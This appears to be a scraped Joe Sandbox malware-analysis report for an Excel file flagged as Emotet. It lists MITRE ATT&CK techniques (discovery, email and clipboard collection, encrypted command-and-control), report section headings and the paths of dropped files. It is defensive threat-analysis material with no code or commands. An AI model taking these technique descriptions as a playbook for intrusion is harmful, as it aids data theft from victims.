Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 80_513972285.xls

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Emotet

Yara Overview

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary

Jbx Signature Overview

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\QWER.dll

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\se[1].htm

C:\Users\user\AppData\Local\Temp\3DBB.tmp

C:\Users\user\AppData\Local\Temp\~DF33AC78DEA2F7DEBE.TMP

C:\Users\user\AppData\Local\Temp\~DFD5CC603F304DA47F.TMP

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msge (copy)

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\S5S79XMEXB2FN0C1X28V.temp

C:\Users\user\Desktop\80_513972285.xls

C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda (copy)

Static File Info

General

File Icon

Static OLE Info

Windows Analysis Report
80_513972285.xls

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre